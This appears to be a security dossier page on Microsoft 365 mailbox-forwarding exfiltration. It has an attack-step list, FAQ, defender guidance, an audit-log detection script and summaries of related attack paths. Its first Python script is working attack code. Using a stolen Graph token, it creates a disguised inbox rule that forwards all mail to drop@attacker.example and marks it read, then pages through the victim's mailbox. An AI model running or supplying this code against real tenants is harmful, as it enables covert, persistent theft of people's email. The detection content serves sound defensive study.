Mailbox forwarding rule → silent data exfil
Starting from a compromised user account, create an Inbox rule (or, with Exchange admin rights, a transport rule) that auto-forwards every incoming message to an external attacker mailbox. The rule runs server-side, so it keeps working after the stolen session ends, and it stays invisible until an admin reviews the mailbox's rules or the audit log.
§ Context
Assumed environment: attacker has either a session cookie (via AITM) or an OAuth access token (via device-code phishing) for a user's M365 mailbox. The tenant has not disabled automatic external forwarding (the outbound spam filter policy's AutoForwardingMode is still Automatic or On), so rule-based forwarding to an outside address is delivered rather than dropped.
§ Steps
- 01  Quiet collection of inbound mail (Initial Access: T1078 Valid Accounts)
- 02  Mailbox access via token / cookie (Initial Access: T1078 Valid Accounts)
- 03  Create forwarding rule to attacker mailbox (Collection: M365-MAILBOX-FORWARD, Mailbox Forwarding Rule)
- 04  Optionally batch-exfil via EWS / Graph (Collection: M365-EWS-EXFIL, Exchange Web Services (EWS) Exfil)
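Steps 03 and 04 expressed as Microsoft Graph calls, as an added example that is not tooling from this dossier. It assumes the operator already holds a delegated access token for the victim's mailbox (the output of the AITM or device-code step), read here from a GRAPH_TOKEN environment variable; drop@attacker.example is a placeholder address. The same messageRules endpoint the rule is created through is what a responder queries to enumerate a mailbox's rules.

```python
"""Steps 03 and 04 of this path expressed as Microsoft Graph calls.

Added example for this dossier, not code from the page. Assumptions: the
operator already holds a delegated access token for the victim's mailbox
(the output of the AITM / device-code step), supplied via the GRAPH_TOKEN
environment variable; drop@attacker.example is a placeholder address."""
import json
import os
import urllib.request

GRAPH = "https://graph.microsoft.com/v1.0"


def forward_rule_payload(attacker_address, hide=True):
    """Request body for POST /me/mailFolders/inbox/messageRules.

    forwardTo (rather than redirectTo) still delivers the original to the
    victim, so nothing goes missing. With hide=True the victim's copy is
    also marked read, keeping the rule's activity out of the unread view.
    Omitting 'conditions' makes the rule match every inbound message."""
    actions = {
        "forwardTo": [{"emailAddress": {"address": attacker_address}}],
        "stopProcessingRules": False,
    }
    if hide:
        actions["markAsRead"] = True
    return {
        "displayName": ".",   # a near-empty name is easy to overlook in Outlook's rule list
        "sequence": 1,
        "isEnabled": True,
        "actions": actions,
    }


def graph(token, method, url, body=None):
    """Minimal authenticated Graph request; returns the decoded JSON body."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(url, data=data, method=method, headers={
        "Authorization": "Bearer " + token,
        "Content-Type": "application/json",
        "Accept": "application/json",
    })
    with urllib.request.urlopen(req) as resp:
        raw = resp.read()
    return json.loads(raw) if raw else {}


def create_forward_rule(token, attacker_address):
    # Step 03. Needs the MailboxSettings.ReadWrite delegated scope on the token.
    return graph(token, "POST", GRAPH + "/me/mailFolders/inbox/messageRules",
                 forward_rule_payload(attacker_address))


def list_inbox_rules(token):
    # The same endpoint a responder calls to audit a mailbox's rules.
    return graph(token, "GET", GRAPH + "/me/mailFolders/inbox/messageRules")["value"]


def iter_messages(token, page_size=50):
    """Step 04: walk the mailbox page by page via @odata.nextLink (Mail.Read scope)."""
    url = (GRAPH + "/me/messages?$top=%d" % page_size
           + "&$select=subject,from,receivedDateTime,bodyPreview")
    while url:
        page = graph(token, "GET", url)
        for msg in page.get("value", []):
            yield msg
        url = page.get("@odata.nextLink")


if __name__ == "__main__":
    token = os.environ.get("GRAPH_TOKEN")
    if not token:
        # Offline: just show the rule body that would be posted.
        print(json.dumps(forward_rule_payload("drop@attacker.example"), indent=2))
    else:
        print(create_forward_rule(token, "drop@attacker.example"))
        for m in iter_messages(token):
            print(m["receivedDateTime"], m["from"]["emailAddress"]["address"], m["subject"])
```

Without GRAPH_TOKEN set the script only prints the rule body; with it, it creates the rule and pages through the mailbox. The two scopes named in the comments (MailboxSettings.ReadWrite, Mail.Read) are what the token must carry, which is also why tokens minted through device-code phishing for a first-party client that already holds them are so useful in this path.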
§ References
- T1078 Valid Accounts
§ Frequently asked
- What is the "Mailbox forwarding rule → silent data exfil" attack path?
- Starting from a compromised user account, create an Inbox rule (or, with Exchange admin rights, a transport rule) that auto-forwards every incoming message to an external attacker mailbox. The rule stays invisible until an admin reviews the mailbox's rules or the audit log. It chains four steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- The first step is Quiet collection of inbound mail (T1078), an initial-access primitive. Assumed environment: attacker has either a session cookie (via AITM) or an OAuth access token (via device-code phishing) for a user's M365 mailbox.
- What is the final impact of this kill-chain?
- The final step lands on Optionally batch-exfil via EWS / Graph (M365-EWS-EXFIL), which falls under Collection. The forwarding rule created in step 03 is itself the persistence: it keeps copying mail to the attacker address after the stolen cookie or token expires, and survives a password reset, until someone removes the rule. From there an operator typically pivots into the content it yields (password-reset links, invoices, internal contacts) for further post-exploitation.
- How can defenders detect or prevent this attack?
- Prevention: turn off automatic external forwarding tenant-wide (the outbound spam filter policy's automatic-forwarding setting, Set-HostedOutboundSpamFilterPolicy -AutoForwardingMode Off) or block it with a mail flow rule; for the upstream steps, use phishing-resistant MFA against AITM and block the device code flow with Conditional Access. Detection: in the Unified Audit Log, alert on New-InboxRule, Set-InboxRule and UpdateInboxRules whose actions forward, redirect or delete, and on Set-Mailbox calls that set ForwardingSmtpAddress or ForwardingAddress; Defender for Office 365 ships a default alert policy, "Creation of forwarding/redirect rule", that covers the inbox-rule case. Periodically sweep all mailboxes with Get-InboxRule and Get-Mailbox for external targets. Each MITRE ATT&CK entry under "References" lists further detection telemetry and known threat-actor usage.
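The audit-log detection described above, as an added example that is not part of this dossier: a small parser over Unified Audit Log records (the shape Search-UnifiedAuditLog returns for Exchange cmdlets) that flags forwarding to addresses outside the tenant and notes when the rule also hides its own activity. The four records and the TENANT_DOMAINS set are constructed assumptions.

```python
"""Detection for step 03 (inbox forwarding rule) and the Set-Mailbox
forwarding variant, run over Microsoft 365 Unified Audit Log records.

Added example for this dossier, not code from the page. The four audit
records below are constructed to resemble Exchange admin-audit entries
(Operation plus Parameters name/value pairs); TENANT_DOMAINS is an assumption."""
import json
import re
from dataclasses import dataclass, field

# Assumption: domains the tenant owns. Any other recipient domain is external.
TENANT_DOMAINS = {"contoso.example", "contoso.onmicrosoft.com"}

# Cmdlet parameters that copy or divert mail to another address.
FORWARD_PARAMS = ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo",
                  "ForwardingSmtpAddress", "ForwardingAddress")
# Parameters attackers pair with forwarding so the victim does not notice.
HIDE_PARAMS = ("DeleteMessage", "MarkAsRead", "MoveToFolder")
# Cmdlet-shaped operations this parser understands. UpdateInboxRules (rules
# edited from the Outlook client) logs a different parameter layout and is
# deliberately left out rather than parsed incorrectly.
WATCHED_OPS = {"New-InboxRule", "Set-InboxRule", "Set-Mailbox"}


@dataclass
class Finding:
    user: str
    operation: str
    external_targets: list = field(default_factory=list)
    hides_activity: bool = False


def addresses(value):
    """Normalise 'smtp:a@x;smtp:b@y' / 'a@x' style parameter values to addresses."""
    out = []
    for part in re.split(r"[;,]", str(value)):
        part = re.sub(r"^smtp:", "", part.strip().strip('"'), flags=re.I)
        if "@" in part:
            out.append(part.lower())
    return out


def is_external(addr):
    return addr.rsplit("@", 1)[-1] not in TENANT_DOMAINS


def analyze(record):
    """Return a Finding if this record forwards mail outside the tenant, else None."""
    if record.get("Operation") not in WATCHED_OPS:
        return None
    params = {p["Name"]: p["Value"] for p in record.get("Parameters", [])}
    external = [a for name in FORWARD_PARAMS
                for a in addresses(params.get(name, "")) if is_external(a)]
    if not external:
        return None
    hides = any(str(params.get(h, "")).lower() not in ("", "false") for h in HIDE_PARAMS)
    return Finding(record.get("UserId", "?"), record["Operation"], external, hides)


def scan(lines):
    """Scan newline-delimited JSON audit records and return the findings."""
    return [f for f in (analyze(json.loads(line)) for line in lines if line.strip()) if f]


# Constructed sample records; shapes follow the Exchange admin-audit schema.
SAMPLE_LOG = """
{"Operation":"New-InboxRule","UserId":"alice@contoso.example","Parameters":[{"Name":"Name","Value":"."},{"Name":"ForwardTo","Value":"smtp:drop@attacker.example"},{"Name":"DeleteMessage","Value":"True"}]}
{"Operation":"Set-Mailbox","UserId":"admin@contoso.example","Parameters":[{"Name":"Identity","Value":"bob"},{"Name":"ForwardingSmtpAddress","Value":"smtp:bob.archive@contoso.example"}]}
{"Operation":"Set-Mailbox","UserId":"alice@contoso.example","Parameters":[{"Name":"Identity","Value":"alice"},{"Name":"ForwardingSmtpAddress","Value":"smtp:drop@attacker.example"},{"Name":"DeliverToMailboxAndForward","Value":"True"}]}
{"Operation":"New-InboxRule","UserId":"carol@contoso.example","Parameters":[{"Name":"Name","Value":"Newsletters"},{"Name":"MoveToFolder","Value":"Newsletters"}]}
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        flag = " (hides activity)" if f.hides_activity else ""
        print(f"{f.user}: {f.operation} -> {', '.join(f.external_targets)}{flag}")
```

Two of the four constructed records are flagged: alice's inbox rule (external forward plus DeleteMessage, so the victim never sees the forwarded mail) and the Set-Mailbox change on alice's mailbox pointing ForwardingSmtpAddress outside the tenant. Bob's internal archive forward and Carol's plain move-to-folder rule are ignored, which is the noise an alert on "any new inbox rule" would otherwise generate.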
§ Related dossiers
- Shared techniques: 3
AITM phishing (Evilginx) → M365 session theft → mailbox exfil
Reverse-proxy phishing kit intercepts the entire login flow including MFA. Stolen session cookie → access M365 mailbox / SharePoint without retriggering auth.
- Shared techniques: 2
FIDO2 caBLE hybrid → phone authenticator hijack
Attacker phishing site shows the legitimate FIDO2 QR. Victim scans with their phone authenticator. The link completes the WebAuthn ceremony in the attacker's browser — they're now signed in as the victim.
- Shared techniques: 2
Slack token in CI log → DM history → vendor mailbox compromise
A CI run echoed a Slack xoxb-/xoxp- token. Use it to read DMs, harvest password-reset links and vendor invitations, pivot into the corporate mailbox.
- Shared techniques: 2
Malicious browser extension → cookie harvest → ATO
Publish a useful-looking extension (ad-blocker / PDF reader). It quietly reads cookies + localStorage from sensitive sites and ships them to the attacker.
- Shared techniques: 2
Compromised CFO mailbox → invoice fraud → wire fraud
AITM phishing nets the CFO's M365 session. Attacker sets a mail rule to hide replies, edits a pending invoice's wire details, sends the modified PDF to AP from the legit mailbox.
- Shared techniques: 2
MFA fatigue / prompt-bombing → M365 admin compromise
Attacker has the password (from breach / spray) but not MFA. Spam push approvals at 2 AM until the user taps yes out of habit — used in the Uber and 0ktapus breaches.